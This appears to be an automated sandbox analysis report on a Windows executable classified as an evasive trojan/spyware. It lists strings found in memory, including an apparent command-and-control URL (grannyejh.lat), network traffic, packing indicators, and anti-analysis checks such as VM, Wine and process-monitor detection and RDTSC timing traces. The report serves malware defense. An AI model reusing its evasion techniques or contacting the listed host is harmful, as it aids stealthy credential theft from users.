                Source: 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/api
                Source: 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: 0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: 0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: 0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: 0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: 0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: 0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: 0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: 0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49727 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49732 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: 0WO49yZcDA.exeStatic PE information: section name:
                Source: 0WO49yZcDA.exeStatic PE information: section name: .idata
                Source: 0WO49yZcDA.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_061396290_3_06139629
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_06139AB90_3_06139AB9
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_061392D30_3_061392D3
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_061394C30_3_061394C3
                Source: 0WO49yZcDA.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0WO49yZcDA.exeStatic PE information: Section: ZLIB complexity 0.9974047517123288
                Source: 0WO49yZcDA.exeStatic PE information: Section: isktfjdo ZLIB complexity 0.9946853422395677
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@3/1
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 0WO49yZcDA.exe, 00000000.00000003.2362985184.00000000060C8000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2387838153.00000000060AC000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2387838153.000000000613F000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2363621748.00000000060AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 0WO49yZcDA.exeReversingLabs: Detection: 65%
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile read: C:\Users\user\Desktop\0WO49yZcDA.exeJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: 0WO49yZcDA.exeStatic file information: File size 1870848 > 1048576
                Source: 0WO49yZcDA.exeStatic PE information: Raw size of isktfjdo is bigger than: 0x100000 < 0x1a0600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeUnpacked PE file: 0.2.0WO49yZcDA.exe.f70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;isktfjdo:EW;rvricfai:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;isktfjdo:EW;rvricfai:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: 0WO49yZcDA.exeStatic PE information: real checksum: 0x1ca473 should be: 0x1c90bc
                Source: 0WO49yZcDA.exeStatic PE information: section name:
                Source: 0WO49yZcDA.exeStatic PE information: section name: .idata
                Source: 0WO49yZcDA.exeStatic PE information: section name:
                Source: 0WO49yZcDA.exeStatic PE information: section name: isktfjdo
                Source: 0WO49yZcDA.exeStatic PE information: section name: rvricfai
                Source: 0WO49yZcDA.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_0196CB0D pushad ; retf 0_3_0196CB61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_0196CB0D pushad ; retf 0_3_0196CB61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_0196CB64 pushad ; retf 0_3_0196CB65
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_0196CB64 pushad ; retf 0_3_0196CB65
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_0613BA00 pushad ; ret 0_3_0613BA11
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_0613D70C push esi; retf 0_3_0613D70F
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeCode function: 0_3_06135C73 push es; iretd 0_3_06135CD1
                Source: 0WO49yZcDA.exeStatic PE information: section name: entropy: 7.977841389176462
                Source: 0WO49yZcDA.exeStatic PE information: section name: isktfjdo entropy: 7.954008306742392

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: FC7FD3 second address: FC78AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007F65CC527CA3h 0x0000000d jmp 00007F65CC527CA1h 0x00000012 push dword ptr [ebp+122D1609h] 0x00000018 jnc 00007F65CC527CABh 0x0000001e jno 00007F65CC527CA5h 0x00000024 call dword ptr [ebp+122D193Eh] 0x0000002a pushad 0x0000002b jmp 00007F65CC527CA9h 0x00000030 jmp 00007F65CC527CA6h 0x00000035 xor eax, eax 0x00000037 cmc 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c stc 0x0000003d mov dword ptr [ebp+122D35E5h], eax 0x00000043 pushad 0x00000044 jmp 00007F65CC527C9Ah 0x00000049 jl 00007F65CC527C96h 0x0000004f popad 0x00000050 mov esi, 0000003Ch 0x00000055 jmp 00007F65CC527CA8h 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e pushad 0x0000005f jng 00007F65CC527C9Ch 0x00000065 or eax, dword ptr [ebp+122D36A1h] 0x0000006b sub dh, 00000013h 0x0000006e popad 0x0000006f lodsw 0x00000071 mov dword ptr [ebp+122D1BF6h], edx 0x00000077 mov dword ptr [ebp+122D1BF6h], eax 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 mov dword ptr [ebp+122D1BF6h], eax 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b je 00007F65CC527CAFh 0x00000091 pushad 0x00000092 jmp 00007F65CC527CA1h 0x00000097 or eax, 1D1614C5h 0x0000009d popad 0x0000009e push eax 0x0000009f push eax 0x000000a0 push edx 0x000000a1 jp 00007F65CC527C98h 0x000000a7 pushad 0x000000a8 popad 0x000000a9 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: FC78AE second address: FC78B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: FC78B4 second address: FC78B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: FC78B8 second address: FC78BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11448DC second address: 11448EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F65CC527C96h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11448EA second address: 11448F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11448F5 second address: 11448F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11448F9 second address: 11448FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 112F644 second address: 112F648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 112F648 second address: 112F652 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F65CD2EDEE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1143AE8 second address: 1143AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1143AED second address: 1143B07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65CD2EDEF5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1143B07 second address: 1143B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F65CC527CA8h 0x00000010 pop edi 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1143B2E second address: 1143B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jc 00007F65CD2EDEECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11459EB second address: FC78AE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65CC527C9Ch 0x00000008 js 00007F65CC527C96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xor dword ptr [esp], 60B6FEA5h 0x00000017 mov dword ptr [ebp+122D2D8Fh], edx 0x0000001d push dword ptr [ebp+122D1609h] 0x00000023 jmp 00007F65CC527CA5h 0x00000028 call dword ptr [ebp+122D193Eh] 0x0000002e pushad 0x0000002f jmp 00007F65CC527CA9h 0x00000034 jmp 00007F65CC527CA6h 0x00000039 xor eax, eax 0x0000003b cmc 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 stc 0x00000041 mov dword ptr [ebp+122D35E5h], eax 0x00000047 pushad 0x00000048 jmp 00007F65CC527C9Ah 0x0000004d jl 00007F65CC527C96h 0x00000053 popad 0x00000054 mov esi, 0000003Ch 0x00000059 jmp 00007F65CC527CA8h 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 pushad 0x00000063 jng 00007F65CC527C9Ch 0x00000069 or eax, dword ptr [ebp+122D36A1h] 0x0000006f sub dh, 00000013h 0x00000072 popad 0x00000073 lodsw 0x00000075 mov dword ptr [ebp+122D1BF6h], edx 0x0000007b mov dword ptr [ebp+122D1BF6h], eax 0x00000081 add eax, dword ptr [esp+24h] 0x00000085 mov dword ptr [ebp+122D1BF6h], eax 0x0000008b mov ebx, dword ptr [esp+24h] 0x0000008f je 00007F65CC527CAFh 0x00000095 pushad 0x00000096 jmp 00007F65CC527CA1h 0x0000009b or eax, 1D1614C5h 0x000000a1 popad 0x000000a2 push eax 0x000000a3 push eax 0x000000a4 push edx 0x000000a5 jp 00007F65CC527C98h 0x000000ab pushad 0x000000ac popad 0x000000ad rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1145A6E second address: 1145AD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F65CD2EDEE6h 0x00000009 jng 00007F65CD2EDEE6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xor dword ptr [esp], 3949C6A8h 0x00000019 mov esi, edi 0x0000001b push 00000003h 0x0000001d mov ch, bh 0x0000001f push 00000000h 0x00000021 mov si, dx 0x00000024 mov edi, dword ptr [ebp+122D348Dh] 0x0000002a push 00000003h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F65CD2EDEE8h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 0000001Dh 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 mov si, 04FEh 0x0000004a push AC8AC074h 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 pushad 0x00000053 popad 0x00000054 js 00007F65CD2EDEE6h 0x0000005a popad 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1145BA3 second address: 1145BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1145BA7 second address: 1145BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F65CD2EDEE8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov edx, dword ptr [ebp+122D3571h] 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D2F8Bh], ebx 0x00000032 push B03B9AB5h 0x00000037 pushad 0x00000038 pushad 0x00000039 jmp 00007F65CD2EDEECh 0x0000003e ja 00007F65CD2EDEE6h 0x00000044 popad 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1145CBB second address: 1145CD0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F65CC527C9Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
